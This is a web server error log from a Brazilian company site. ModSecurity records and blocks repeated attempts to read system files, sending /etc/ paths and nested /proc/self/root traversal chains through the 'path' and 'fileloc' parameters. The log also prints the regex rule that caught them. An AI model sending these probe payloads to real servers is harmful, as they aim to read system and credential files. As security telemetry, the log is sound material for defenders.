[Fri Mar 20 12:44:08.543022 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:34664] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rSNa6ubjKNq_cu4YbUwAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:44:11.266624 2026] [:error] [pid 7893:tid 140411616036608] [client 74.7.241.31:34678] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rSxCii7xarUs8iHaovAAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:44:12.615831 2026] [:error] [pid 7235:tid 140411658000128] [client 74.7.241.31:34684] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rTPqxLDW4GITHUkQpngAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:44:19.482987 2026] [:error] [pid 10189:tid 140411725141760] [client 74.7.241.31:34690] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rUzJ3M9BSuKP7CAZo4QAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:44:21.587224 2026] [:error] [pid 7235:tid 140411674785536] [client 74.7.241.31:34792] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rVfqxLDW4GITHUkQppQAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:44:21.726884 2026] [:error] [pid 21219:tid 140411649607424] [client 216.73.216.191:34166] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/anacrontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1rVfXLqtnMIWvjpaLbBgAAAos"]
[Fri Mar 20 12:44:23.294045 2026] [:error] [pid 10189:tid 140411699963648] [client 74.7.241.31:34802] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rVjJ3M9BSuKP7CAZo4wAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:44:24.872811 2026] [:error] [pid 26799:tid 140411607643904] [client 216.73.216.191:34218] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1rWNa6ubjKNq_cu4YbZgAAA1A"]
[Fri Mar 20 12:44:24.968043 2026] [:error] [pid 7893:tid 140411666392832] [client 216.73.216.191:34178] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/euca2ools"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1rWBCii7xarUs8iHaoxwAAAgk"]
[Fri Mar 20 12:44:25.254930 2026] [:error] [pid 10189:tid 140411582465792] [client 74.7.241.31:34804] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rWTJ3M9BSuKP7CAZo5gAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:44:27.753306 2026] [:error] [pid 9818:tid 140411590858496] [client 74.7.241.31:34814] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rW11pVZ5mVmJwsFNrygAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:44:31.026206 2026] [:error] [pid 7893:tid 140411616036608] [client 74.7.241.31:41712] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rXRCii7xarUs8iHaozAAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:44:31.037523 2026] [:error] [pid 7893:tid 140411708356352] [client 216.73.216.191:34562] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/statetab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1rXBCii7xarUs8iHaoyQAAAgQ"]
[Fri Mar 20 12:44:31.840853 2026] [:error] [pid 26799:tid 140411699963648] [client 57.141.18.30:34718] [client 57.141.18.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1rX9a6ubjKNq_cu4YbcAAAA0U"]
[Fri Mar 20 12:44:32.331132 2026] [:error] [pid 7893:tid 140411741927168] [client 57.141.18.89:34744] [client 57.141.18.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/polkit-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1rYBCii7xarUs8iHao0AAAAgA"]
[Fri Mar 20 12:44:36.461790 2026] [mime_magic:error] [pid 26799:tid 140411725141760] (70014)End of file found: [client 216.73.216.191:34566] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:44:37.171538 2026] [:error] [pid 7893:tid 140411683178240] [client 74.7.241.31:41720] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rZRCii7xarUs8iHao3wAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:44:38.494988 2026] [:error] [pid 9818:tid 140411616036608] [client 74.7.241.31:56282] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rZl1pVZ5mVmJwsFNrzQAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:44:39.622893 2026] [:error] [pid 31215:tid 140411649607424] [client 216.73.216.191:35158] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1rZwF0L0L-SsrnPo6lUAAAAss"]
[Fri Mar 20 12:44:39.847037 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.241.31:56296] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rZ_qxLDW4GITHUkQpvQAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:44:41.204638 2026] [:error] [pid 21219:tid 140411632822016] [client 74.7.241.31:56304] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rafXLqtnMIWvjpaLbFgAAAo0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:44:41.270857 2026] [:error] [pid 31215:tid 140411733534464] [client 74.7.228.61:38816] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1raQF0L0L-SsrnPo6lUgAAAsE"]
[Fri Mar 20 12:44:41.661796 2026] [mime_magic:error] [pid 21219:tid 140411708356352] (70014)End of file found: [client 216.73.216.191:35298] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:44:43.582960 2026] [:error] [pid 9818:tid 140411599251200] [client 216.73.216.191:35358] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1ral1pVZ5mVmJwsFNr1AAAAFE"]
[Fri Mar 20 12:44:46.395308 2026] [:error] [pid 10189:tid 140411733534464] [client 74.7.241.31:56320] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rbjJ3M9BSuKP7CAZo-gAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:44:47.917508 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.241.31:37278] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rb-oXxyEfFpUF8f-9PwAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
